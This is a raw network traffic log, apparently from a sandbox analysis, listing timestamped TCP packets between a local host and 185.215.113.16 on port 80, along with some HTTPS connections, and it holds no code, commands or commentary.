                                                                                                                                                                      Nov 21, 2024 06:23:39.029503107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.029650927 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.030546904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.030627966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.030770063 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.031630993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.031769037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.031822920 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.032711983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.032829046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.032877922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.033847094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.033962011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.034008980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.034687996 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.034890890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.034971952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.035969973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.036024094 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.036097050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.036147118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.037051916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.037179947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.037235022 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.038131952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.087213993 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.157140017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.157222986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.157269955 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.157658100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.157772064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.157818079 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.158802032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.158900023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.158956051 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.159846067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.160058022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.160113096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.160974979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.161108017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.161149979 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.162028074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.162168026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.162208080 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.163100004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.163177967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.163242102 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.173975945 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.174727917 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.174762011 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.175189972 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.175194979 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.180772066 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.180814981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.180867910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.181308031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.181564093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.181664944 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.182194948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.182306051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.182385921 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.183218002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.183362007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.183478117 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.184348106 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.184597969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.184643984 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.185394049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.185528040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.186506033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.186548948 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.186624050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.186665058 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.187625885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.187638044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.187680960 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.188651085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.188833952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.188879967 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.189713955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.189829111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.189873934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.190803051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.190977097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.191023111 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.191926956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.192030907 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.192075968 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.192996979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.193043947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.193088055 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.194087029 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.194209099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.194261074 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.195188046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.195259094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.195310116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.196233034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.196244955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.196284056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.197350025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.197452068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.197501898 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.198447943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.198543072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.198589087 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.199507952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.199521065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.199579000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.200625896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.200712919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.200758934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.201787949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.201827049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.201878071 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.202811956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.202831984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.202883005 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.203833103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.203866959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.203912973 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.204898119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.205039978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.205085039 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.205996037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.206105947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.206144094 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.216727018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.216754913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.216797113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.216816902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.216844082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.216856003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.216866970 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.216903925 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.216968060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.216979980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217024088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217042923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217046976 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.217070103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217082024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217086077 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.217106104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217142105 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.217185020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217209101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217237949 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.217238903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217262983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217283010 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.217293978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217327118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217339039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.217340946 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.217405081 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.218878031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.218966961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.219023943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.221148014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.221204996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.221257925 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.221287966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.221299887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.221338987 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.221396923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.221410990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.221456051 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.222244024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.222362041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.222407103 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.223335028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.223550081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.223695040 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.224420071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.224522114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.224642992 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.225506067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.225614071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.225662947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.226594925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.226703882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.227670908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.227721930 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.227778912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.227834940 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.228785992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.228799105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.228841066 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.229815006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.229887962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.229938030 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.279866934 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.280282974 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.280317068 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.280711889 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.280719042 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.299485922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.303572893 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.304029942 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.304059029 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.304486036 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.304491043 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.349292040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.349349022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.349430084 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.349751949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.349805117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.349867105 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.350872993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.350991964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.351061106 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.351937056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.352170944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.352226019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.353086948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.353151083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.353195906 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.354110003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.354258060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.354321957 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.355180979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.355256081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.355317116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.373102903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.373240948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.373301983 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.373588085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.373801947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.373859882 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.374666929 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.374794960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.374958992 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.375756025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.375904083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.376004934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.376821041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.376986027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.377033949 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.377909899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.378089905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.378277063 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.379050016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.379137993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.379194021 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.380084991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.380173922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.380652905 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.381292105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.381381989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.381422997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.382242918 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.382385969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.382433891 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.383351088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.383471012 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.383531094 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.384378910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.384495974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.384540081 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.385477066 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.385627985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.385691881 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.386589050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.386677027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.386722088 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.387665987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.387814999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.387980938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.388777018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.388920069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.389033079 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.389799118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.389880896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.390022039 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.390922070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.390934944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.391014099 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.392000914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.392148972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.392204046 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.393111944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.393124104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.393163919 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.394170046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.394181967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.394243002 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.395251989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.395390987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.395849943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.396351099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.396420002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.396799088 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.397423029 CET8049762185.215.113.16192.168.2.6
